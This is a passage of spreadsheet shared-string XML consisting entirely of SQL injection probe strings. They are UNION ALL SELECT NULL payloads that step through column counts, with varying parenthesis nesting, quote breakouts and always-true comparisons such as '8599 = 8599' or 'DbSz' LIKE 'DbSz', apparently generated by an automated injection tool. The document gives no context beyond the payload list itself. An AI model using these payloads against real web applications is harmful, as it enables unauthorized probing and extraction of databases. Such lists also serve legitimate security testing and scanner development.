    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 8599 = 8599</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6430 = 6430</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 8493 = 8493</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5545 = 5545</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6228 = 6228</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3377 = 3377</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7221 = 7221</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  133 = 133</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3238 = 3238</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7985 = 7985</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5136 = 5136</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  589 = 589</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  4509 = 4509</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  9777 = 9777</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  928 = 928</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6859 = 6859</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 868 = 868</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6603 = 6603</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3241 = 3241</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8518 = 8518</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 2926 = 2926</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3445 = 3445</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 715 = 715</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3340 = 3340</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3666 = 3666</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'pccB' = 'pccB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Qbeh' = 'Qbeh</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'JIRu' = 'JIRu</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'OKAH' = 'OKAH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'zwbN' = 'zwbN</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rDpW' = 'rDpW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'OjNK' = 'OjNK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'JVrA' = 'JVrA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'StVI' = 'StVI</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'mquA' = 'mquA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Ixmg' = 'Ixmg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Iyno' = 'Iyno</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'XOZF' = 'XOZF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'rbjj' = 'rbjj</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'gAXS' = 'gAXS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'RcJk' = 'RcJk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'pkfe' = 'pkfe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'LeWT' = 'LeWT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'VFGY' = 'VFGY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ErGC' = 'ErGC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'IwyU' = 'IwyU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'qkkC' = 'qkkC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Ksqa' = 'Ksqa</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Ohlk' = 'Ohlk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'rXQC' = 'rXQC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'iTBZ' = 'iTBZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'CHOr' = 'CHOr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'UKpj' = 'UKpj</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'rJqI' = 'rJqI</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'rWfO' = 'rWfO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'gVaa' = 'gVaa</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xSWz' = 'xSWz</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'cPtn' = 'cPtn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'KyPA' = 'KyPA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xBJw' = 'xBJw</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'cDPM' = 'cDPM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'RBOO' = 'RBOO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'gKwB' = 'gKwB</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'PqYz' = 'PqYz</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'NgjL' = 'NgjL</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'DbSz' LIKE 'DbSz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'mCiE' LIKE 'mCiE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rFxT' LIKE 'rFxT</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'iDKk' LIKE 'iDKk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'bxnA' LIKE 'bxnA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hCbT' LIKE 'hCbT</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'MdeC' LIKE 'MdeC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'MJrk' LIKE 'MJrk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'HQtn' LIKE 'HQtn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'bRZR' LIKE 'bRZR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'NtHU' LIKE 'NtHU</t>
  </si>
  <si>
